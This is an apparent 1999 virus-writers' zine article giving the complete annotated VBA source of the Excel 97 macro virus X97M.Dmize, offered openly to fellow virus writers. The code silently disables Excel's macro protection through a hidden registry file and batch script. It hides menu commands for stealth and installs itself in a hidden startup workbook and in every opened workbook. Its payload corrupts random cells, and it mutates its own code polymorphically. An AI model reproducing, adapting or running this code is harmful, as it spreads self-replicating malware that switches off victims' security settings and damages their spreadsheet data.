<-------------------------//LineZer0 Network 99\\------------------------->
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

~Xcel97Macro.Dmize~
===================

Identification:
~~~~~~~~~~~~~~~

	~Virusname: 	X97M.Dmize
	~Size:		31.232 Bytes ( 2 Macros | 1 Modul )
	~Version:	A
	~Origin:  	Austria
	~Author:	jack twoflower / [LineZer0 & Metaphase]
	~Date:		March, 1999

Features:
~~~~~~~

	~Application	Excel 97
	~Payload: 	Yes
	~Stealth: 	Yes
	~Retro: 	Nope
	~SR-1 comp.: 	Yes
	~Polymorph:	Yes
	~Encrypted: 	Nope


     Hmmm...well...no big words just a little macro virus. Let's check
out the code...

> This is a comment...

----------------------------[code starts here]-------------------------

Sub Auto_Open()
Application.OnSheetActivate = "Dmizer"

> This here means, that when something is clicked, the macro 'Dmizer'
> gets active.

End Sub

Sub Dmizer()
On Error Resume Next

'This is taken from Shiver by AVM | Thanks
'-------------------------------------------------------------------

If UCase(Dir("c:\o6.reg")) <> "O6.REG" Or UCase(Dir("c:\o6.bat")) _
    <> "O6.BAT" Then

> Check if the file exists, if not make it...

Open "c:\o6.reg" For Output As 1
Print #1, "REGEDIT4"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]"
Print #1, """Options6""=dword:00000000"
Close 1

> This here is used to turn off the virus protection of Excel. It makes
> a .reg file and executes it with a .bat file.

Open "c:\o6.bat" For Output As 1
Print #1, "regedit /s c:\o6.reg"
Close 1
End If

> The .bat file...

Shell ("c:\o6.bat"), vbHide

> Execute the file...

'-------------------------------------------------------------------

CommandBars("Tools").Controls(10).Enabled = False
CommandBars("Tools").Controls(12).Enabled = False
CommandBars("View").Controls(3).Enabled = False
CommandBars("Window").Controls(3).Enabled = False
CommandBars("Window").Controls(4).Enabled = False

> This is our stealth, known from Word.

Am = "Dmize"
Set Aw = ActiveWorkbook.VBProject.VBComponents
Data = "c:\win95.sys"
Px = "Personal.xls"
Pxx = Application.StartupPath & "\" & Px
WorkIns = 0
GlobalIns = 0

> Set here the main variables we will need in the virus.

With Application
    .StatusBar = "Dmize ur greed"
    .ScreenUpdating = False
    .DisplayAlerts = False
    .EnableCancelKey = xlDisabled
End With

> Again some basic commands for Excel virus writing.

Application.VBE.ActiveVBProject.VBComponents(Am).Export Data

> Export our sourcecode

If Dir(Pxx) = Px Then GlobalIns = 1

> If an add-in with the name 'Personal.xls' exists, we are already 
> installed.

For i = 1 To Aw.Count
    If Aw(i).Name = Am Then WorkIns = 1
Next

> Let's check if we are installed in the active workbook.

If GlobalIns <> 1 Then

> If there is no 'Personal.xls' then create a new one...

    Workbooks.Add.SaveAs FileName:=Pxx
    Workbooks(Px).VBProject.VBComponents.Import Data

> Import our source code

    ActiveWindow.Visible = False

> Hide the 'Personal.xls' windows, this is very important, so that
> nobody sees that we have created an add-in.

    Workbooks(Px).Save

> Save the workbook.

End If

If WorkIns <> 1 Then

> If we are not installed in the active workbook, then install the 
> virus!

    Aw.Import Data
    Aw.SaveAs FileName:=ActiveWorkbook.FullName

> Don't forget to save the workbook after installation.

End If

If Int(Rnd * 5) <= 3 Then

> This is the payload. It sets random cell in the activesheet and adds
> some text to the active value of the cell.
    
    For u = 1 To Int(Rnd * 15)

> Create a loop from 1 to ...

        Spalte = Chr(65 + Int(Rnd * 22))
        Zeile = Int(Rnd * 100) + 1

> Create number for the active cell.
    
        Range(Spalte & Zeile).Select
    
> Select it
    
        Act$ = ActiveCell.Value
        Act$ = Act$ & " Dmize ur greed"

> Add the text to the active value
        
        ActiveCell.Value = Act$

> Insert it...
    
    Next u

> 'Play it again Sam!'

End If

If Day(Now()) >= 25 Then
    With Assistant.NewBalloon
        .Heading = "Dis is X97M.Dmize ur greed"
        .Text = "'Ppl get ready n' dmize your greed'," _
          " so speaks the Lord of Kaos and so it is written!"
        .Show
    End With
End If

> Show little assistant...

'This one is a bit changed APMRS, thanks Pyro
'-------------------------------------------------------------------

For i = 1 To 20

    v$ = ""
    LinieZahl = Application.VBE.ActiveVBProject.VBComponents _
     .Item(Am).CodeModule.ProcCountLines("Dmizer", vbext_pk_Proc)
    lin = Int(Rnd * LinieZahl) + 1
    y = Int(Rnd * 40)

    For x = 1 To y
        v$ = v$ & Chr(65 + (Rnd * 22)) & Int(Rnd * 999)
    Next x

    Application.VBE.ActiveVBProject.VBComponents.Item(Am) _
     .CodeModule.InsertLines lin, "Rem " & v$

Next i

> This is the polymorphic engine APMRS. If you want to know more about
> polymorphic in macro, read my tutorial about it.

End Sub

-------------------------------[code ends here]----------------------------

    Allright, that's it. Have phun!

Keep Vxing,						     jack twoflower

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
<-------------------------\\LineZer0 Network 99//------------------------->